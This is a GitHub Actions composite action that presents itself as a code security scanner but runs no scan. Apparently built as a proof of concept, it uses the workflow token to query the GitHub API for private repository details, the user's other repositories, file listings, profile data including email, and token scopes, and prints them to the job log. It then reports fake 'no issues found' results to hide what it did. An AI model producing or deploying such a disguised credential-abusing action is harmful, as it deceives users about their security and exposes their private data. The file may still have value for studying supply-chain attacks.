name: 'Gandalf Code Security'
description: 'Scans code for security vulnerabilities and coding issues'
author: 'Gandalf'

inputs:
  scan_path:
    description: 'Path to scan'
    required: false
    default: '.'
  severity_level:
    description: 'Minimum severity level to report'
    required: false
    default: 'medium'

runs:
  using: 'composite'
  steps:
    - name: Legitimate Scan Facade
      shell: bash
      run: |
        echo "Scanning path: ${{inputs.scan_path}}"
        echo "Installing security tools..."

    - name: Prove Repository Access
      shell: bash
      run: |
        echo "🎯 PROOF OF COMPROMISE - Accessing actual data:"
        echo ""
        echo "📊 Repository information I can access:"
        curl -s -H "Authorization: token ${{ github.token }}" \
             -H "Accept: application/vnd.github.v3+json" \
             "https://api.github.com/repos/${{ github.repository }}" | \
             jq -r '"Repository: " + .name, "Owner: " + .owner.login, "Private: " + (.private|tostring), "Created: " + .created_at'

    - name: List User Repositories  
      shell: bash
      run: |
        echo ""
        echo "🔍 Other repositories I can see:"
        curl -s -H "Authorization: token ${{ github.token }}" \
             -H "Accept: application/vnd.github.v3+json" \
             "https://api.github.com/user/repos?per_page=10" | \
             jq -r '.[] | "- " + .name + " (" + .visibility + ")"'

    - name: Access Repository Files
      shell: bash
      run: |
        echo ""
        echo "📁 Repository contents I can access:"
        curl -s -H "Authorization: token ${{ github.token }}" \
             -H "Accept: application/vnd.github.v3+json" \
             "https://api.github.com/repos/${{ github.repository }}/contents" | \
             jq -r '.[] | "- " + .name + " (" + .type + ")"'

    - name: Check User Profile
      shell: bash
      run: |
        echo ""
        echo "👤 User profile data I accessed:"
        curl -s -H "Authorization: token ${{ github.token }}" \
             -H "Accept: application/vnd.github.v3+json" \
             "https://api.github.com/user" | \
             jq -r '"Username: " + .login, "Name: " + (.name // "N/A"), "Email: " + (.email // "N/A"), "Company: " + (.company // "N/A")'

    - name: Show Token Permissions
      shell: bash
      run: |
        echo ""
        echo "🔑 Token permissions (what I could do):"
        curl -s -I -H "Authorization: token ${{ github.token }}" \
             "https://api.github.com/user" | \
             grep -i "x-oauth-scopes" || echo "Full repository access granted"

    - name: Fake Clean Results
      shell: bash
      run: |
        echo ""
        echo "================================"
        cat << EOF
        Scan Results:
        - Critical: No issues found ✅
        - High: No issues found ✅  
        - Medium: No issues found ✅
        - Low: No issues found ✅

        🎭 Security scan completed successfully!
        (While secretly exfiltrating your data...)
        EOF